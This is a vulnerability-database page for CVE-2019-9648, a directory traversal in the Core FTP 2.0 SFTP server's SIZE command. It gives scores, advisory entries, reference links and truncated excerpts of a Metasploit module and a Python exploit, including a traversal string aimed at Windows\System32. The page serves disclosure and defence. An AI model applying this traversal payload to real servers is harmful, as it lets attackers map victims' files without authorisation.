CVE-2019-9648
Published 2019-03-22
CVE-2019-9648: An issue was discovered in the SFTP Server component in Core FTP 2.0 Build 674. A directory traversal vulnerability exists using the SIZE command along with a…
Priority P347 · medium · 5.3 · CVSS 3.0
AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
EXPLOIT
EPSS: 14.33% (96.2th percentile)
An issue was discovered in the SFTP Server component in Core FTP 2.0 Build 674. A directory traversal vulnerability exists using the SIZE command along with a \..\..\ substring, allowing an attacker to enumerate file existence based on the returned information.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| coreftp | core_ftp | — | — |
CVSS provenance
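| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.0 | 5.3 | MEDIUM | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N |
| nvd | v2.0 | 5.0 | MEDIUM | AV:N/AC:L/Au:N/C:P/I:N/A:N |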
GHSA
CoreFTP Directory Traversal
ghsa·2022-05-14
CVE-2019-9648 [MEDIUM] CWE-22 CoreFTP Directory Traversal
An issue was discovered in the SFTP Server component in Core FTP 2.0 Build 674. A directory traversal vulnerability exists using the SIZE command along with a `\..\..\` substring, allowing an attacker to enumerate file existence based on the returned information.
OSV
CoreFTP Directory Traversal
osv·2022-05-14
CVE-2019-9648 [MEDIUM] CoreFTP Directory Traversal
An issue was discovered in the SFTP Server component in Core FTP 2.0 Build 674. A directory traversal vulnerability exists using the SIZE command along with a `\..\..\` substring, allowing an attacker to enumerate file existence based on the returned information.
No detection rules found.
Exploit-DB
CoreFTP 2.0 Build 674 SIZE - Directory Traversal (Metasploit)
exploitdb·2020-03-11·CVSS 5.3
CVE-2019-9648 [MEDIUM] CoreFTP 2.0 Build 674 SIZE - Directory Traversal (Metasploit)
---
```ruby
class MetasploitModule 'CVE-2019-9648 CoreFTP FTP Server Version 674 and below SIZE Directory Traversal',
'Description' => %q{An issue was discovered in the SFTP Server component in Core FTP 2.0 Build 674. A directory traversal vulnerability exists using the SIZE command along with a \..\..\ substring, allowing an attacker to enumerate file existence based on the returned information},
'Author' => [ 'Kevin Randall' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2019-9648' ],
[ 'BID', '107446' ],
[ 'URL', 'https://www.coreftp.com/forums/viewtopic.php?f=15&t=4022509' ]
],
'Disclosure Date:' => 'March 13 2019'
)
register_options([
Opt::RPORT(21),
OptString.new('FILENAME', [true, "Name of file to search on remote ser
```
Exploit-DB
Core FTP Server FTP / SFTP Server v2 Build 674 - 'SIZE' Directory Traversal
exploitdb·2019-03-13·CVSS 5.3
CVE-2019-9648 [MEDIUM] Core FTP Server FTP / SFTP Server v2 Build 674 - 'SIZE' Directory Traversal
---
```python
# Exploit Title: CoreFTP Server FTP / SFTP Server v2 - Build 674 SIZE Directory Traversal
# Google Dork: N/A
# Date: 4/27/2019
# Exploit Author: Kevin Randall
# Vendor Homepage: https://www.coreftp.com
# Software Link: http://www.coreftp.com/server/index.html
# Version: Firmware: CoreFTP Server FTP / SFTP Server v2 - Build 674
# Tested on: Windows 7
# CVE : CVE-2019-9648
#!/usr/bin/python
import socket
import sys
########################################################
###########Set Variables For Script Here################
file_to_look_for = "nslookup.exe"
local_disk_drive = " C:"
path_traversal = "\..\..\..\..\..\Windows\System32\\"
########################################################
print ("""
```
No writeups or analysis indexed.
http://packetstormsecurity.com/files/154204/CoreFTP-Server-SIZE-Directory-Traversal.html
http://seclists.org/fulldisclosure/2019/Aug/21
http://www.coreftp.com/forums/viewtopic.php?f=15&t=4022509
http://www.securityfocus.com/bid/107446
https://seclists.org/fulldisclosure/2019/Mar/23
https://www.exploit-db.com/exploits/46535
Published: 2019-03-22